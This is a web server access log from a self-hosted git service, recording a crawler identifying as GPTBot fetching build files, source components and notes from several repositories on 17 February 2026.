"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10266] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10012] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10167] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10673] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10238] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10003] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14919] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10357] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:16:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:16:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:16:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11727] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13180] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11214] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13636] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:16:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11181] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 10004] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13918] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:16:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10166] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:16:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:16:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fobj%2fTestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 21835] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:16:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 21135] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:16:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 21327] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:16:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 20598] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:16:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 11055] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 15936] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 